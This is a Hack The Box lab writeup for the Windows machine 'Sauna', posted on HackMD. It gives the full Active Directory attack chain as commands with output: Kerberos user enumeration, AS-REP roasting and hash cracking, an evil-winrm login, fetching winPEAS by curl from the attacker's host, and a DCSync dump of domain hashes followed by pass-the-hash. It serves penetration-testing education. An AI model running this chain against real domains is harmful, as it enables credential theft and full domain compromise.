Try   HackMD

Scanning & Enumeration

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-27 02:47 EDT
Nmap scan report for 10.10.10.175
Host is up (0.15s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Simple DNS Plus
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-27 13:47:42Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m03s
| smb2-time: 
|   date: 2023-04-27T13:47:56
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.88 seconds

Domain : EGOTISTICAL-BANK.LOCAL
we also have smb port open, as well as a web server running.

PORT 80

port80

PORT 445

PORT 389/636

with the command : ldapsearch -x -H ldap://10.10.10.175 -s base

PORT 88

using kerbrute, I first performed username enumeration with a wordlist from SecLists using the command:

kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /path/to/SecLists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175

Now we have hsmith, fsmith, where we also have a smith from the about page of the website. I create a list of usernames for each one found in the website:

└─$ cat usernames.txt    
fsmith
scoins
hbear
btaylor
sdriver

Initial Foothold

AS-REP Roasting
└─$ impacket-GetNPUsers 'EGOTISTICAL-BANK.LOCAL/' -usersfile usernames.txt -format hashcat -outputfile hashes -dc-ip 10.10.10.175
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

└─$ cat hashes 
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:e94ecc252a526efeee56c20af22ac0d4$22183e886837f706421f088a9338a07bc940c2a605620d8f6aa77f3af95ee0eb9e5b744ec80c377eb09bfd9a56d51cc0e1007a6358ed4d10e6d5a32cd0318d9aa3d6ee1fbccaa46a7ed00a179abcde6fe96d0f0698a895854919251da4984942aa75dde5ee579cfa832a75a9bf123ea0970b6d1e13a1d0d51a84989e84339af38b91cc0d6c8a0459fd07735d8473d8cd4f2b63efd8ad8d3500397bf3be9dba0cce6523a8debadd7de00666bf24cf158a89da6e02f5bb1eaace47f4efc3e7a2499fd91b0582481b878f24a95d4ae6fa9c4ec2703ecbffd9095826f248930bbee68384dcc34a20fee4d155c6e4310d78d0aa2a6934e1306f46359e3699401cb1a6

We have the hash for the user fsmith, we proceed to crack it with hashcat or john however you see fit , with the command:

HASHCAT

hashcat -m 18200 hashes /path/to/rockyou.txt --force

JOHN

john --wordlist=/path/to/rockyou.txt hashes

The password is : Thestrokes23

You can then connect with evil-winrm using the command:

evil-winrm -i 10.10.10.175 -u "fsmith" -p "Thestrokes23"

The user flag can be found in C:\Users\FSmith\Desktop\user.txt

Privilege Escalation

I first upload winPeas which will allow me to understand and know my approach to privilege escalation.

I will host a python web server in the directory where winpeas is at:

python3 -m http.server

and from the target that we just logged in, I shall run:

curl http://<myIP>:8000/winPEASany.exe -OutFile winpeas.exe

Then I shall execute the binary.

While winpeas runs , there is some information that is provided where we can see that there is AutoLogon credentials available:

We now proceed to check for all users that are in the server:

We can see that the username is actually : svc_loanmgr. Now we login using evil-winrm. And we proceed further using bloodhound since it's all AD.

I upload sharphound to the server, and run it. Then wait for the results.

i'll then import the ZIP file to blood hound for further analysis:

Checking for the user SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL as a node we will be able to see that the user has outbound object control as shown below:

He has GetChanges, GetChangesAll, and DCSync . Now checking for descriptive information about these privilege:

So with conjunction with the GetChangesAll privilege we can perform a DCSync attack. From the article there are alot of ways to do this attack. I'll do it with the secretsdump from impacket.

I run secrets dump with the command:

impacket-secretsdump 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'

Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:2b7af355cec716eccceabd185054878a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:7883b96590554850767bcd615e8477fbc7f21276730dc5dcd92d4b8e1745b333
SAUNA$:aes128-cts-hmac-sha1-96:db8fd7cd326d2d15c7abccf8bea8a0c8
SAUNA$:des-cbc-md5:104c515b86739e08

Now I upload mimikatz to the server, and run it as follows:

.\mimikatz.exe 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:aministrator' exit

I shall now use wmiexec from impacket to get shell as administrator :

impacket-wmiexec -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175

And we have access as administrator :)

Last changed by 
Tahaa Farooq
お前はもう死んでいる
0
3
348

Read more

Authentication Bypass via SQLi on edoc doctor appointment system

This is a POC for the vulnerabiliy that I had found on the open source software edoc doctor appointment system.

Jul 14, 2025
UnderPass Hackthebox Writeup

An easy box from HTB, we first get access to daloradius with weak credentials using them to expose a potential user with his hashed (weak) password, I crack the password ending up getting the plaintext password and we use the password to login to the host via SSH! Easy Win! Lastly we escalate our privileges by taking advantage of Mosh (Mobile Shell). 🚀

May 10, 2025
Secret Writeup Hackthebox

So found 3 open ports , 22(SSH), 80(HTTP) , 3000(HTTP) with Node.js , Opening port 80 it had a landing page which was titled Dump Docs , and both were also there on port 3000 with a file named files.zip attached which contains the source code of how the api works

Apr 27, 2025
DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

With default credential for the guest user “guest:guest” to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users.

Feb 20, 2025
Read more from Tahaa Farooq
Published on HackMD